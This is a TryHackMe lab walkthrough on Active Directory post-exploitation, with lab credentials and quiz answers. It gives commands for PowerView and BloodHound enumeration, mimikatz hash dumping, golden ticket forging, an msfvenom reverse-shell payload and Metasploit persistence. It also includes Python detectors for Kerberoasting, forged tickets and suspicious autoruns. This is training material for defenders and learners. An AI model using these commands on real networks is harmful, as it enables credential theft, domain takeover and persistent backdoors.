
TryHackMe: Post-Exploitation Basics

Learn the basics of post-exploitation and maintaining access with mimikatz, bloodhound, powerview and msfvenom


Task 2: Enumeration w/ Powerview

Your machine IP is MACHINE_IP

Username: Administrator

Password: P@$$W0rd

Domain Name: CONTROLLER


Steps for this section:

1.) Start PowerShell: powershell -ep bypass (the -ep bypass flag bypasses the PowerShell execution policy so you can run scripts without restriction)


2.) Start PowerView - . .\Downloads\PowerView.ps1


3.) Enumerate the domain users - Get-NetUser | select cn


4.) Enumerate the domain groups - Get-NetGroup -GroupName *admin*


Q. What is the shared folder that is not set by default?

Hint: Invoke-ShareFinder

Ans: share

Q. What operating system is running inside of the network besides Windows Server 2019?

Hint: Get-NetComputer -fulldata | select operatingsystem

Ans: Windows 10 Enterprise Evaluation

Q. I've hidden a flag inside of the users find it

Hint: Get-NetUser | select cn

Ans: POST{P0W3RV13W_FTW}

Task 3: Enumeration w/ Bloodhound

Bloodhound is a graphical interface that lets you visually map out the network. Its collector, SharpHound (similar in spirit to PowerView), gathers the users, groups, trusts, etc. of the network into .json files that are then imported into Bloodhound.


BloodHound Installation -

1.) apt-get install bloodhound

2.) neo4j console - default credentials -> neo4j:neo4j


Getting loot w/ SharpHound -


1.) powershell -ep bypass (same as with PowerView)


2.) . .\Downloads\SharpHound.ps1


3.) Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip


4.) Copy the zip to your attacker machine (i.e. Kali): scp .\20200609093439_loot.zip root@kali_ip:/root/loot.zip

Note: 20200609093439_loot.zip is the file produced by step 3; the timestamp prefix will differ on your run.


5.) Import loot.zip into Bloodhound on the attacker machine (the Kali machine).


If you are asked for credentials, use the defaults: neo4j:neo4j

From there you can dig into whatever information you need.


Q. What service is also a domain admin?

Hint: Choose Queries then Find All Domain Admins

Ans: sqlservice

Q. What two users are Kerberoastable?

Hint: Choose queries then list all kerberoastable users

Ans: sqlservice, krbtgt

Task 4: Dumping hashes w/ mimikatz

Mimikatz is a very popular and powerful post-exploitation tool, mainly used for dumping user credentials inside of an Active Directory network.


Dump Hashes w/ mimikatz

1.) cd Downloads && mimikatz.exe - this changes into the directory where mimikatz is kept and runs the mimikatz binary


2.) privilege::debug - ensure the output is "Privilege '20' ok". This confirms you are running mimikatz as an administrator; if you don't run mimikatz as an administrator, it will not work properly


3.) lsadump::lsa /patch - dump those hashes


Crack those hashes w/ hashcat

hashcat -m 1000 <hash> rockyou.txt (mode 1000 is NTLM)

or

you can use an online lookup such as CrackStation.


Q. What is the Machine1 Password?

Ans: Password1

Q. What is the Machine2 Hash?

Ans: c39f2beb3d2ec06a62cb887fb391dee0

Task 5: Golden Ticket Attacks w/ mimikatz

We will first dump the hash and sid of the krbtgt user then create a golden ticket and use that golden ticket to open up a new command prompt allowing us to access any machine on the network.


Dump the krbtgt Hash -

1.) cd downloads && mimikatz.exe


2.) privilege::debug - ensure this outputs "Privilege '20' ok"


3.) lsadump::lsa /inject /name:krbtgt - this dumps the hash and security identifier (SID) of the Kerberos Ticket Granting Ticket account, which is what you need to create a golden ticket.


Create a Golden Ticket -


1.) kerberos::golden /user:Administrator /domain:<from step 3> /sid:<from step 3> /krbtgt:<from step 3> /id:<from step 3>


Use the Golden Ticket to access other machines -

1.) misc::cmd - this opens a new command prompt; because the golden ticket is loaded in the current session, that prompt has elevated privileges on all machines in the domain


2.) Access other machines! - you now have a command prompt with access to every other machine on the network
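Both of the findings above (the Kerberoastable accounts BloodHound listed in Task 3, and the golden ticket built in this task) leave traces in the domain controller's Security log, so here is the defender's side as an added example. This Python is not code from the room or the write-up. It assumes two facts about Windows Kerberos auditing: event 4768 is logged when a TGT is issued and 4769 when a service ticket is issued, and a TicketEncryptionType of 0x17 means RC4-HMAC. The event lines are constructed in a simplified key=value form rather than real Windows event XML, and the field names (account, service, enc, ip) are this example's own.

```python
from collections import defaultdict

# Constructed sample events (not real Windows event log output). One line per
# 4768 (TGT issued) or 4769 (service ticket issued) record, flattened to key=value.
SAMPLE_EVENTS = """\
ts=2020-06-09T09:30:01 id=4768 account=sqlservice@CONTROLLER.local ip=10.10.1.20
ts=2020-06-09T09:30:05 id=4769 account=sqlservice@CONTROLLER.local service=CONTROLLER-1$ enc=0x12 ip=10.10.1.20
ts=2020-06-09T09:31:10 id=4768 account=jdoe@CONTROLLER.local ip=10.10.1.50
ts=2020-06-09T09:31:12 id=4769 account=jdoe@CONTROLLER.local service=sqlservice enc=0x17 ip=10.10.1.50
ts=2020-06-09T09:31:13 id=4769 account=jdoe@CONTROLLER.local service=svc-backup enc=0x17 ip=10.10.1.50
ts=2020-06-09T09:31:14 id=4769 account=jdoe@CONTROLLER.local service=krbtgt enc=0x17 ip=10.10.1.50
ts=2020-06-09T09:40:00 id=4769 account=Administrator@CONTROLLER.local service=CONTROLLER-1$ enc=0x12 ip=10.10.1.99
"""


def parse_events(text):
    """Parse the key=value lines into a list of dicts, preserving order."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        events.append(dict(tok.split("=", 1) for tok in line.split()))
    return events


def find_kerberoasting(events, min_services=2):
    """Kerberoasting indicator: one account requesting RC4 (0x17) service tickets
    for several user-account SPNs in a short span. Machine accounts (ending in $)
    and krbtgt are excluded to cut noise. Returns {requesting account: [services]}."""
    per_requester = defaultdict(set)
    for ev in events:
        if ev["id"] != "4769" or ev.get("enc") != "0x17":
            continue
        svc = ev["service"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        per_requester[ev["account"]].add(svc)
    return {acct: sorted(s) for acct, s in per_requester.items() if len(s) >= min_services}


def find_tgs_without_tgt(events):
    """Golden-ticket indicator: a forged TGT is never requested from the KDC, so the
    account shows 4769 service-ticket activity with no earlier 4768 on record.
    Assumes the events are in chronological order."""
    seen_tgt = set()
    suspicious = []
    for ev in events:
        if ev["id"] == "4768":
            seen_tgt.add(ev["account"].lower())
        elif ev["id"] == "4769" and ev["account"].lower() not in seen_tgt:
            suspicious.append((ev["ts"], ev["account"], ev["service"], ev["ip"]))
    return suspicious


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    print("possible kerberoasting:", find_kerberoasting(evs))
    print("service tickets with no TGT issued:", find_tgs_without_tgt(evs))
```

Both checks are heuristics: the missing-4768 rule only holds when you have the logs from every domain controller (a TGT issued by another DC looks the same as a forged one otherwise), and RC4 service-ticket requests also appear for legitimate clients that cannot use AES. Treat hits as leads to confirm, not verdicts.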


Enumeration w/ Server Manager

Connect to the VM w/ RDP:

Your machine IP is -------

Username: Administrator

Password: P@$$W0rd

Domain Name: CONTROLLER


In Server Manager, open the Tools menu and select Active Directory Users and Computers. This brings up a list of all users on the domain, along with other useful containers such as Groups and Computers. Look through the user descriptions.


Q. What tool allows you to view the event logs?

Ans: Eventviewer

Q. What is the SQL Service password?

Ans: Mypassword123#

Task 7: Maintaining Access

Generating a Payload w/ msfvenom


1.) msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o shell.exe - this generates a basic Windows Meterpreter reverse TCP shell (set LHOST to your attacker IP and LPORT to the port your listener will use)


2.) Transfer the payload from your attacker machine to the target machine.


3.) use exploit/multi/handler - this creates a listener on the port that you set.


4.) Configure our payload to be a windows meterpreter shell: set payload windows/meterpreter/reverse_tcp


5.) After setting your THM IP address as LHOST, start the listener with run


6.) Executing the binary on the Windows machine returns a Meterpreter shell to your host - let's return to that


7.) Verify that we've got a meterpreter shell, where we will then background it to run the persistence module.


Run the Persistence Module


1.) use exploit/windows/local/persistence - by default this module sends a payload every 10 seconds, but you can set that delay to anything you want


2.) set session 1 - set the session to the one we backgrounded in Meterpreter (you can use the sessions command in Metasploit to list the active sessions)


If the system is shut down or reset for whatever reason, you will lose your Meterpreter session. By using the persistence module, however, you create a backdoor into the system that you can reach at any time: start the Metasploit multi handler again, set the payload to windows/meterpreter/reverse_tcp, and the machine will send another Meterpreter payload back, opening a new Meterpreter session.
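What the persistence module leaves behind is exactly what a defender goes looking for. The following Python is an added example, not code from the room or the write-up. It assumes, from the module's own documentation rather than anything on this page, that its default startup method registers an autorun entry under a registry Run key that launches a dropped script from the user's temp directory; the registry listing below is constructed to resemble `reg query` output, and the entry names in it are invented for the example.

```python
import re

# Constructed sample (not real output): roughly what `reg query` shows for a
# user's Run key. The last entry mimics a script-host autorun pointing at %TEMP%.
SAMPLE_RUN_KEY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    XtZkqPwL    REG_SZ    wscript.exe //B //Nologo C:\Users\Administrator\AppData\Local\Temp\XtZkqPwL.vbs
"""

# Interpreters and LOLBins that rarely belong in a Run entry on a workstation.
SCRIPT_HOSTS = re.compile(
    r"\b(wscript|cscript|mshta|powershell|pwsh|rundll32|regsvr32)(\.exe)?\b", re.I
)
# Locations any user can write to; legitimate autoruns live in Program Files / system32.
USER_WRITABLE = re.compile(
    r"(\\Temp\\|%TEMP%|\\AppData\\Local\\Temp|\\Users\\Public\\|\\ProgramData\\)", re.I
)


def parse_run_key(text):
    """Turn reg-query style text into [{key, name, type, value}, ...].
    Unindented lines are key paths; indented lines are 'name  type  value'."""
    entries, key = [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):
            key = line.strip()
            continue
        name, typ, value = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        entries.append({"key": key, "name": name, "type": typ, "value": value})
    return entries


def flag_autoruns(entries):
    """Return (key, name, [reasons]) for each entry that launches a script host
    or runs something from a user-writable path."""
    findings = []
    for e in entries:
        reasons = []
        if SCRIPT_HOSTS.search(e["value"]):
            reasons.append("script host")
        if USER_WRITABLE.search(e["value"]):
            reasons.append("user-writable path")
        if reasons:
            findings.append((e["key"], e["name"], reasons))
    return findings


if __name__ == "__main__":
    for key, name, reasons in flag_autoruns(parse_run_key(SAMPLE_RUN_KEY)):
        print(f"{key}\\{name}: {', '.join(reasons)}")
```

On a real host you would feed this the output of `reg query` for both the HKCU and HKLM Run keys (the module's USER and SYSTEM startup methods write to one or the other), and triage hits by checking whether the referenced file exists, who created it, and when. An entry that hits both rules is a strong candidate for removal along with the dropped script it points at.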


That's it. Follow each command and you will get the expected answers. If something goes wrong, please contact us.


© AbridgedUp 2021 
